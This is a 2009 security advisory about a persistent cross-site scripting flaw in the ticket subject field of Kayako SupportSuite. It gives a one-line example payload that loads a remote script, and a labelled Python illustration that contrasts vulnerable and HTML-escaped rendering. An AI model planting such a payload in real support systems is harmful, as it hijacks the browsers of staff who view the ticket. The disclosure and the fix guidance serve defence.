
From: Adam Baldwin <adam_baldwin_(at)_ngenuity-is.com>
Date: 10 August 2009
Subject: [NGENUITY] - Ticket Subject Persistent XSS in Kayako SupportSuite

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in Kayako SupportSuite
   Application: SupportSuite v3.50.06
        Vendor: Kayako
Vendor website: http://www.kayako.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)

         Class: Persistent Cross-Site Scripting

 I. BACKGROUND
    "SupportSuite is [Kayako's] flagship product, integrating the ticket and
     e-mail management features of eSupport with the live chat and visitor
     monitoring features of LiveResponse." [1]

II. DETAILS
    The subject field of a newly created support ticket is not properly
    HTML-encoded before being sent to the browser when the ticket details are
    viewed, so markup placed in the subject is rendered as part of the page
    for every user who views that ticket. For more information on cross-site
    scripting, please refer to the Common Weakness Enumeration entry
    available at cwe.mitre.org [2].

    An example attack might look similar to the following.

    </title><script src="example.com/attack.js"></script>
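    To make the defect and its fix concrete, the following Python example
    (added here; it is not Kayako's code and not part of the advisory) renders
    a minimal ticket-details page two ways: once interpolating the subject
    raw, which lets a subject shaped like the payload above close the <title>
    element and start a new tag, and once HTML-encoding it with html.escape at
    the point of output. The function names, the two sample subjects and the
    page layout are constructed for illustration; the title_is_intact check is
    the kind of assertion a regression test for this bug class would carry.

```python
import html
import re

# Constructed sample subjects (not taken from any real ticket). The second
# one has the same shape as the payload the advisory shows.
BENIGN_SUBJECT = "Printer on 3rd floor & scanner offline"
HOSTILE_SUBJECT = '</title><script src="example.com/attack.js"></script>'


def render_ticket_page_vulnerable(subject: str) -> str:
    """Reproduces the defect class: the subject is interpolated into the
    <title> element and the page body without any encoding."""
    return (
        "<html><head><title>Ticket: " + subject + "</title></head>"
        "<body><h1>" + subject + "</h1></body></html>"
    )


def render_ticket_page_fixed(subject: str) -> str:
    """Hardened version: HTML-encode the subject at the point of output.
    html.escape turns <, >, &, " and ' into entities, so a subject can
    never close the <title> element or open a new tag."""
    safe = html.escape(subject, quote=True)
    return (
        "<html><head><title>Ticket: " + safe + "</title></head>"
        "<body><h1>" + safe + "</h1></body></html>"
    )


TITLE_CLOSE = re.compile(r"</title\s*>", re.IGNORECASE)
SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def title_is_intact(page: str) -> bool:
    """Regression check: a well-formed ticket page has exactly one </title>
    (the template's own) and no <script> tag originating from user input."""
    return len(TITLE_CLOSE.findall(page)) == 1 and not SCRIPT_OPEN.search(page)


def recovered_subject(page: str) -> str:
    """Pull the text between <h1> and </h1> and decode it, to confirm that
    encoding still shows the reader exactly the subject that was typed."""
    m = re.search(r"<h1>(.*?)</h1>", page, re.DOTALL)
    return html.unescape(m.group(1)) if m else ""


if __name__ == "__main__":
    renderers = (
        ("vulnerable", render_ticket_page_vulnerable),
        ("fixed", render_ticket_page_fixed),
    )
    for subject in (BENIGN_SUBJECT, HOSTILE_SUBJECT):
        for name, render in renderers:
            page = render(subject)
            print(f"{name:10} intact={title_is_intact(page)}  {page}")
```

    The fix encodes at output time rather than sanitising on input: the
    stored subject stays exactly what the user typed (recovered_subject shows
    it round-trips), and every place that emits it into HTML applies the
    encoding appropriate for that context.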

III. REFERENCES
    [1] - http://www.kayako.com
    [2] - http://cwe.mitre.org/data/definitions/79.html

IV. VENDOR COMMUNICATION
    7.17.2009 - Vulnerability Discovery
    7.20.2009 - Initial Vendor Response
    7.21.2009 - Patch created, will be pushed to the next stable release
    8.08.2009 - Advisory released

http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/
